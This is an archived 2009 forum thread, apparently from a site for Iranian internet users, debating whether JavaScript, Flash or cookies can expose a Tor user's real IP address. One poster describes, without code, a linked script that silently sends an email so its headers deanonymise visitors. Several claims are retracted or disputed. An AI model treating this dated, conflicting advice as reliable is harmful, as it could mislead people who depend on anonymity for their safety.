will javascript reveal the true identity?

Discussion in 'Keeping Your Anonymity In Iran' started by Unregistered, Jun 26, 2009.

  1. if a user in iran disabled javascript and was using tor and the user wanted to access a website, will enabling javascript mean the person's real ip address is shown even if they are using tor?
  2. Hechicera Member

  3. echo-IRAN Member

    Javascript in the blocking industry includes other active contents such as flash.

    Javascript as an extension of HTML is pretty safe, sand boxed in the browser, dealing only with data from site. But flash is external to the browser and has some access to your computer. You IP is hidden from TOR, but flash can find out something from your computer, IP might be one of those, depending on what the plug-in is. Flash from well known sites are safe, or people will bark at them. Unknown sites may spy on you or attack you.
  4. Javascript, depending on whether it's Server-side or Client-side, can obtain data. Client-side is generally safe, but with stuff that gets external info it could be risky. I dont know if it's only the Tor info it can grab or what, but be careful.

    NoScript when using Tor for added protection, but Tor is supposed to kill Javascript anyway
  5. echo-IRAN Member

    If you are not trying to spread disinformation, sincerely want to help, register so people can get back at you to verify information.

    Is the guy asking the question sitting at his server? No, of course he is a client. If I say javascript is totally safe someone will bound to say something irrelevant, so leave it at that. As you say client side javascript on a webpage absolutely has no privilege of gaining any information about your computer, except for some security holes that hasn't plugged yet.

    In TOR only the entry node knows your IP and nothing else. To find anything more about you all three nodes you use have to be your enemies, have to store everything, decrypt everything, correlate and find needle in a hay stack of users.

    Any other plug in's are like flash, java and other plays are like downloaded applications. They can find out some information from your computer and send it back to base. There's nothing related to TOR.
  6. Test this link out: see if it shows you your true ip address

    Without a proxy get your real ip address:

    What Is My IP Address? - IP Address Lookup, Internet Speed Test, IP Info, plus more

    And with a proxy try this:

    The JavaScript Source: User Details: IP Address

    Do this in either order. Make sure you do nothing to reset your IP address in between doing those things.

    As a developer, if javascript can access the info, then I can assure you that I can get it.

    So all I need to know is if you see your correct IP address when you use this and then, if you can, I can certainly create an application that can grab that info.

    Good luck.

    [MODEDIT: the poster wishes to retract this statement, anyways, do your own research people, exploits, flash, cookies w/ javascript can be used to compromise your security. Please use TOR and hopefully a portable firefox or Opera install that you only use for visiting sites you are worried about]
  7. echo-IRAN Member

    Wow, this site is infested with professional disformers. Reid, this is not called registration.

    If you are using TOR, of course you get the IP address of a TOR node. What do you want to imply? Do you understand the first post?
  8. Hechicera Member

    Right then, copypastafu

    From my first link above, Tor's official site. As I said, for me, my Firefox doesn't leave home without NoScript, torbutton or no torbutton. I tend to uninstall Flash. Flash, as posted above is also an issue, and cookies haven't been mentioned yet. Cookies should be cleared every connection, turned off if you can handle it if you want tight security.

    Firefox->Tools->Options..->Privacy Tab, cookies & clear private data
  9. Ray Murphy Member

    I've been wondering how useful this anonymizing information would be for the average user in Iran right now, when most users would have either little access to the net or nothing significant to transmit.

    It also seems to me that if anyone did have news or images to distribute, they would become sitting ducks if they were on a government list of those who had downloaded Tor and then suddenly started transmitting a lot of data or contacting a lot of email addresses within Iran, they would be put under watch.

    I would have thought that once a person was put on a watch-list, a simple analysis program at any given ISP's location could pinpoint the common email address/IP number/person - going from past contacts between those email addresses. For example there is often only ONE person on the planet who uses any given set of email addresses.
  10. Reid Albecker Member

    OK, echo is right

    My original quick search on how to get an ip address using JavaScript produced a result, but I was misled by it. The JavaScript is actually doing nothing but grabbing something that the server put there in the first place. Other sources state that there is no way to get an IP address using javascript. If that is true, then echo is correct.

    Incidentally, the IP addresses wouldn't have matched for the test, which would indicate a FAIL for javascript getting the correct IP address. Which means that anyone doing that test would not conclude that javascript exposed their address to an application.

    But be cautious anyway.
  11. echo-IRAN Member

    Come on, security 101 is not to use anything you cannot verify to be secure. Smart ones will not need your script, and who is dump enough to download your script and do their own security?
  12. Hechicera Member


    You do make good points that access to the main Tor download page may be probably being logged or blocked now. But, there are many mirrors. So, hopefully people can find a mirror or a friend to give them the install package. It may be helpful to mirror Tor elsewhere, get ex-pat blogs to host copies. Need them to be IPs that many others would be visiting anyway. Maybe gaming sites too. Would be nice to see.

    However, just knowing some IP went to Tor isn't sufficient. They need to pressure local IPs for their logs. For instance, my IP comes from a pool from my ISP. It isn't static. I might have a different one next week, or even tomorrow. That kind of tracking also assumes that one protester posted twice from the same place. Hopefully, they are moving about.

    Once you have Tor it will mask where you are going. So someone with Tor can go to Tor's site and it won't look like they went there. That's how it dodges censors. It just looks like a random encrypted connection to some random IP in the Tor network. Some are in big data centers, so this will look very normal.

    Also realize that not everyone that uses Tor would be a protester. This is not a new tool. If the Basij start busting in on businessmen trying to quietly get one account transferred anonymously overseas, then a whole new group will get upset.
  13. < shakes head >

    The script is embedded into a webpage, when the user views the page the script is loaded.

    If the user has lax security that script will cause the users machine to email whatever address is within it transparantly without the users knowledge.

    The recipient of the email then only needs to backtrace the email's origin.

    BTW, it is not "my" script.
  14. echo-IRAN Member

    No body bothers to repost news on this site. Firstly, most users are not thinking about anonymity. They just want working proxies to read news from reliable sources. This is what they asked and still asking. TOR is a proxy that everybody can help with their home computer, not so sure with squid.

    At their official site, Freegate say they cannot cope with the traffic and have to limit or stop the service again. On youtube, I saw a video of a girl that have installed Ultrasurf on her laptop, which stopped working. Ultimately these software offers very similar thing with TOR. TOR published that they have at most thousands of users. Freegate users are probably in the millions. So the govt cannot target you just because you use any of these.
  15. Ray Murphy Member

    Ah, that makes more sense. I assume it would have been mentioned occasionally but I hadn't noticed.
  16. echo-IRAN Member

    Log is log, the basic being the different IP's you used. By law many countries have to store when and what website you visited, from 6 months to 2 years. Govt does not need to pressurize the Irannian ISP's to give up any information, they run the ISP's or they just tell them what to do.
  17. echo-IRAN Member

    Common wisdom: you have about 2 sec in front of your CEO, if you screw that up you may not have the chance to speak again. I would say at war you have about 3 sec with everybody. Obviously, I didn't know what's your point, and I would not have read the script and find out. I just try to guess what you said that may be useful using the few words you posted.

    So what's your point? It's not javascript, it's your email client that may and may not have permission granted to send mail transparently. If your email client allows transparent emails by default, trash it immediately.

    And if you have TOR, your IP is also protected, so I couldn't make out anything that is relevant to the opening post.
  18. echo-IRAN Member

    Not wanting to bump this thread later unnecessarily.

    The point is, if you simply say javascript is bad, soon some users will turn off their javascript at their browser, and demand a javascript free site, which cause a headache for webmasters, causing removal of convenience features to other users. Right here in WWP previsouly.

    Javascript is just a language like English. It depends on how you use it. On a webpage javascript (client) is safe. If not, it's a browser security issue and it's a big deal, losing market share that sort of big deal.

    Firefox addons have the same privilege as any applications, including looking at your files and your IP. It's written in javascript.

    Flash, like any other plugins, is also applications with it's own capabilities. Flash (or whatever it's called) is written in action script, a version of javascript.

    Practically you install Noscript that will block anything risky. It's widely used and sort of trusted. It is just a way for you to disable everything by default, and enable your plug-ins with convenience. It's blocking anything but client-side javascript. The down side is that the first few time you use noscript it may be very frustrated when you cannot view youtube without knowing how to unblock.

    The better way is of course not to visit stranger or hostile websites when you don't have to.

    If you worry about your cookies, there's the flash cookies that's worse.
  19. It is javascript. :rolleyes:

    Javascript which opens the email client and sends an email in the background.

    TOR has no effect on your email client when set to the default settings.
    Tor: Download

    My point is that nefarious sites may use this to attempt to identify protesters.
  20. echo-IRAN Member

    I can see that why you don't want to register. If by default your browser and email client let you send an email transparently, trash them both. When you setup an email client it's like downloading flash player, and you know that it's an application with full access to your computer. You browser just pass control to these external applications, with your blessing.

    Now no decent email client should send an email transparently nowadays. But it's really no big deal because the website will see the same IP as that will be in your email.

    And then how the email client send an email? Through your network connection of course. That means via the same connection that you are surfing the website. The originate IP will have that of a TOR node. If your client actually manage to dig up your external IP via your firewall and announce to the server, trash it too.
  21. i am the original poster. if you disable javascript and try to register for a facebook account it will not let you. it says javascript needs to be enabled. is there anyway around this?
  22. Hechicera Member

  23. echo-IRAN Member

    I know this will happen.

    Javascript from website have no access to your comp and cannot find out your IP, if you are using a proxy. (if you are using firefox)

    If big companies Facebook do something that compromise your privacy, people will find out immediately and revolt, it happened before on Facebook. Any fancy things FB put on their website, like flash, will not try to get your IP, or their stock will plummet.

    If users are allowed to embed some fancy things on their homepage, these may be malicious. But most of these gadgets are standing stuff, used and test by millions.

    The No-script Firefox plug ins in your browser, basically blocks all the plug-ins like flash and all sorts of players. You are pretty safe with it even if you assume FB is out to get you and your IP. Use like the guy say in above post.
  24. < shakes head again >

    Did you click this link ?

    The JavaScript Source: User Details: Visitor Monitor

    If you did and a popup did not show up asking to launch or cancel you have likely just succeded in emailing "" with a topic title of "Devious Visitor Monitor".

    Now, if a "bad guy" from the Iranian government happens to put that script in a ficticious page advertising, for instance, proxies and the unsuspecting protester happens to open that page the bad guy simply needs to read the email header to find the protester.

    I simply do not know how to say it more simply... And I noticed that you did not read the image I previously posted.
  25. echo-IRAN Member

    Are you using IE and Outlook? That's dumb, everybody will tell you that. The IP in the email will be the IP of your proxy, not yours.

    Edit: actually I missed the point of default email clients not using proxy. But is that really dumb? You are sending your IP to everybody while worrying about your IP being logged by facebook?
  26. Hechicera Member

    Yes, the image you posted, which I also I linked to, then copy pasted.

    Curiosity question, you see 0, 1, 2 or 3 from me just now. Tested some combos.
  27. i am the original poster of this thread. i have registered now. i have found a solution for me to register for facebook.
    the solution is, can someone here sign me up for a facebook account? If you can please PM me and i will give you my name,email, and everything you need to create me a facebook account. Then you can PM me back once you have created it.

    So if you are willing to create me a facebook account please PM me now.

    Thank you
  28. Ok guys, don't PM me once you create me a facebook account, email me here:

    Also Post here saying "done" once you created it for me.

  29. I mean email me at saying you will create a facebook account for me. I will then email you my details that you will use to create my facebook account.

Share This Page

Customize Theme Colors


Choose a color via Color picker or click the predefined style names!

Primary Color :

Secondary Color :
Predefined Skins